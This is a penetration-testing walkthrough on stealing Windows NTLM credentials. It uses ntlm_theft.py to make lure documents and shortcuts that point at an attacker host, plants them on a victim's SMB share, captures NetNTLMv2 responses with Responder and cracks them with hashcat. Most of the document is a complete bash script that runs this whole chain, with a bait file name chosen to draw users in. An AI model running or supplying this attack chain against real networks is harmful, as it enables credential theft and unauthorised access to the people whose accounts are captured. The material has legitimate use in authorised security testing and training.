Dumping NTLM hashes via docx file using NTLM Theft
In this step of the exploitation process we use ntlm_theft.py (https://github.com/Greenwolf/ntlm_theft) together with Responder to capture NTLM authentication from the target. ntlm_theft.py generates document and shortcut files that embed a reference to a resource on an attacker-controlled host (a UNC path such as \\attacker\share\file). When a user on the target opens one of them, or in some cases merely views the folder it sits in, the Windows client connects to that host and authenticates automatically with the logged-on user's NTLM credentials. Responder, running on the attacker's machine, answers the connection and records the NetNTLMv2 challenge-response. That response is what is loosely called the "NTLM hash" here: it is not the NT hash stored in the SAM, so it cannot be replayed with pass-the-hash, but it can be cracked offline to recover the user's password, which is valuable for further penetration testing.
- Generate malicious files: run ntlm_theft.py with the following options to generate lure files whose embedded references point at the attacking machine. Explanation of options:
  - -g: which file types to generate (all, or one of the individual types the tool supports).
  - -s: the server IP embedded in the files, i.e. the address of the Kali machine where Responder will be running.
  - -f: the base filename for the generated files.
- Upload files to SMB share: copy the generated files to a writable SMB share on the target, preferably somewhere users actually browse (a shared documents folder, a department share). A .docx lure only fires when someone opens it; .lnk and .scf lures fire as soon as Explorer renders the folder, so they belong in a directory people open routinely.
- Set up Responder: start Responder on the attacking machine. It poisons LLMNR and NBT-NS requests, but what matters for this attack are its SMB and HTTP listeners: the lures point straight at the attacker's IP, so no name poisoning is needed, and those listeners are what answer the client's NTLM authentication and record the challenge-response.
- Trigger authentication requests: wait for a user on the target to open the uploaded file (or for Explorer to render a lure's icon). The client authenticates to Responder, and the captured NetNTLMv2 response is printed on the console and written to Responder's logs directory.
Once you have captured responses, crack them offline with John (--format=netntlmv2) or Hashcat (-m 5600 for NetNTLMv2, or -m 5500 if the client fell back to NetNTLMv1).
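The whole procedure above as one script, added here as a worked example (it is not code from the original page or from the ntlm_theft project). It assumes a Kali box with ntlm_theft.py, Responder, smbclient and hashcat installed; the attacker IP, interface, target, share, credentials, lure name and wordlist are hypothetical placeholders set via environment variables. The two helper functions at the end do the part that is easy to get wrong by hand: picking one NetNTLMv2 line per user out of Responder's log files and choosing the matching hashcat mode.

```shell
#!/usr/bin/env bash
# Added example (not from the page or the ntlm_theft project). All host names,
# addresses, share names and credentials below are hypothetical placeholders.
set -eu

ATTACKER_IP="${ATTACKER_IP:-10.10.14.5}"   # address embedded in the lures (-s); Responder listens here
IFACE="${IFACE:-tun0}"                      # interface Responder binds to
TARGET="${TARGET:-10.10.10.20}"             # victim file server
SHARE="${SHARE:-Shared}"                    # writable share that users actually browse
CREDS="${CREDS:-guest%}"                    # smbclient -U user%pass
LURE="${LURE:-Q3_Bonus_Plan}"               # base name for the generated files (-f)
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"
RESPONDER_LOGS="${RESPONDER_LOGS:-/usr/share/responder/logs}"   # Kali's default Responder log dir

# Step 1: generate every lure type ntlm_theft knows; they land in ./$LURE/
generate_lures() {
    python3 ntlm_theft.py -g all -s "$ATTACKER_IP" -f "$LURE"
}

# Step 2: drop all lures on the share. "prompt" disables per-file confirmation
# so mput runs unattended.
upload_lures() {
    smbclient "//$TARGET/$SHARE" -U "$CREDS" -c "lcd $LURE; prompt; mput *"
}

# Step 3: Responder answers the SMB/HTTP connections the lures trigger.
# -v prints every capture instead of only the first one per user.
start_responder() {
    sudo responder -I "$IFACE" -v
}

# Step 4: Responder writes captures as user::DOMAIN:challenge:response:blob.
# Keep lines that look like NetNTLMv2 (16-hex server challenge, 32-hex HMAC)
# and only the first one per user@domain, since hashcat needs one per account.
extract_hashes() {
    awk -F: '$2 == "" && length($4) == 16 && length($5) == 32 && !seen[tolower($1 "@" $3)]++' "$@"
}

# hashcat mode for the first line on stdin: 5600 = NetNTLMv2, 5500 = NetNTLMv1
# (v1 lines carry two 48-hex responses followed by the challenge).
hash_mode() {
    awk -F: 'NR == 1 { m = (length($4) == 16 && length($5) == 32) ? 5600 : 5500; print m }'
}

crack_hashes() {
    local hashfile=$1
    local mode
    mode=$(head -n 1 "$hashfile" | hash_mode)
    hashcat -m "$mode" -a 0 "$hashfile" "$WORDLIST"
}

main() {
    generate_lures
    upload_lures
    start_responder                       # Ctrl-C once captures show up
    extract_hashes "$RESPONDER_LOGS"/*NTLMv2*.txt > captured.txt
    crack_hashes captured.txt
}

# Only run the full chain when invoked as: ./ntlm_theft_chain.sh run
if [ "${1:-}" = "run" ]; then main; fi
```

The filter is deliberately strict about the field layout: a stray console line or a NetNTLMv1 capture mixed into a 5600 run makes hashcat reject the whole file, so separating the two formats before cracking saves a confusing error.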